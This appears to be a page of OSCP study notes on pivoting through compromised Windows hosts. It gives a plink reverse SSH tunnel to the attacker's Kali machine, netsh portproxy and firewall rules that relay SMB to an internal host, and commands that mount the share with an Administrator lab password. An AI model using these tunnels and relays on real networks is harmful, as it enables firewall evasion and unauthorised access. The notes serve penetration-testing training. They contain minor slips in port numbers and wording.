O
O
OSCP Notes
Search…
⌃K

Port forwarding Windows

netstat -anpb TCP
and see that there's another service running bit firewall is stopping us from connecting to it.
you can transfer plink.exe (windows command line SSH client)
cmd.exe /c echo y | plink.exe -ssh -l kali -pw pass -R kali_IP:1234:127.0.0.1:3396(service running on windows) kali_IP
if it works, we can do a quick nmap scan to confirm:
nmap -sS -sV 127.0.0.1 -p 1234
----

Using SYSTEM level shell to pivot through with NETSH

-netsh is installed on most windows
  • it has to have the IP Helper service running and IPv6 support enabled (can be confirmed on windows Services & network interfaces settings)
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=current_IP connectport=445 connectaddress=other_network_IP
add firewall rule
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=current_IP localport=4455 action=allow
on kali, we stop the smb service
sudo /etc/init.d/smbd restart
smbclient -L target_IP(compromised) --port=4455 --user=Administrator
then try to mount file shares
sudo mkdir /mnt/win10_share
sudo mount -t cifs -o port=4455 //10.11.0.22/Data -o username=Administrator,password=Qwerty09! /mnt/win10_share
ls -l /mnt/win10_share/
cat /mnt/win10_share/data.txt